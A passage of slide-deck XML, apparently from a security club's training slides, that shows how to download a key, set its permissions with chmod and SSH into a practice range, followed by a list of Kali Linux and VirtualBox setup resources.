          <p:cNvPr id="776" name="Google Shape;776;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1165860"/>
            <a:ext cx="816102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000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>The Range uses key-based SSH, the same authentication we covered earlier, just with the key handed to you instead of generated by you.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1748790"/>
            <a:ext cx="308610" cy="308610"/>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78" name="Google Shape;778;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520179" y="1788909"/>
            <a:ext cx="228371" cy="228371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Google Shape;779;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="1735074"/>
            <a:ext cx="226314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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Grab the key</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="1927098"/>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Download the .pem file pinned in the #defense-team channel on Discord</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2173986"/>
            <a:ext cx="308610" cy="308610"/>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82" name="Google Shape;782;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520179" y="2214105"/>
            <a:ext cx="228371" cy="228371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="2160270"/>
            <a:ext cx="226314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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Lock down its permissions</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Google Shape;784;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="2352294"/>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SSH refuses a private key that other users can read. Fix that with chmod</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Google Shape;785;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2599182"/>
            <a:ext cx="308610" cy="308610"/>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786" name="Google Shape;786;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520179" y="2639301"/>
            <a:ext cx="228371" cy="228371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Google Shape;787;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="2585466"/>
            <a:ext cx="226314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000"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Connect</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="2777490"/>
            <a:ext cx="40462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800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Pass the key with -i on your ssh command</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3188970"/>
            <a:ext cx="8161020" cy="1303020"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4211" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4D0000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="101600" rotWithShape="0" algn="bl" dir="5400000" dist="25400">
              <a:srgbClr val="000000">
                <a:alpha val="7843"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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790" name="Google Shape;790;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="3291840"/>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700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ON YOUR KALI VM'S TERMINAL</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="3497580"/>
            <a:ext cx="75438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Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod 400 range-key.pem</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="792" name="Google Shape;792;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="3874770"/>
            <a:ext cx="7543800" cy="3429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1100"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh -i range-key.pem &lt;your-username&gt;@&lt;range-host&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Google Shape;793;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4629150"/>
            <a:ext cx="816102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1" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ask in #defense-team for your username and the Range's current host address.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Google Shape;794;p38"/>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Connecting to the Range</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Google Shape;795;p38"/>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00" name="Shape 800"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Google Shape;801;p39"/>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C7268"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>WHERE THIS CAME FROM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Google Shape;802;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="493776"/>
            <a:ext cx="816102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B1E1D"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Resources &amp; citations</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="137160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04" name="Google Shape;804;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="1407262"/>
            <a:ext cx="202997" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="135788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Kali Linux, official downloads</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="806" name="Google Shape;806;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="161163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kali.org/get-kali</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Google Shape;807;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1954530"/>
            <a:ext cx="274320" cy="2743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08" name="Google Shape;808;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="1990192"/>
            <a:ext cx="202997" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809" name="Google Shape;809;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="194081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Kali Linux, virtualization docs</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="219456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kali.org/docs/virtualization</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="253746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12" name="Google Shape;812;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="2573122"/>
            <a:ext cx="202997" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Google Shape;813;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="252374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Kali on UTM, official guide</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="277749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kali.org/docs/virtualization/install-utm-guest-vm</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Google Shape;815;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3120390"/>
            <a:ext cx="274320" cy="2743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16" name="Google Shape;816;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="3156052"/>
            <a:ext cx="202997" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Google Shape;817;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="310667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Kali on VirtualBox, official guide</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Google Shape;818;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="336042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kali.org/docs/virtualization/install-virtualbox-guest-vm</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="370332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20" name="Google Shape;820;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="3738982"/>
            <a:ext cx="202997" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Google Shape;821;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="368960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VirtualBox</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="394335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virtualbox.org</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4286250"/>
            <a:ext cx="274320" cy="2743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24" name="Google Shape;824;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
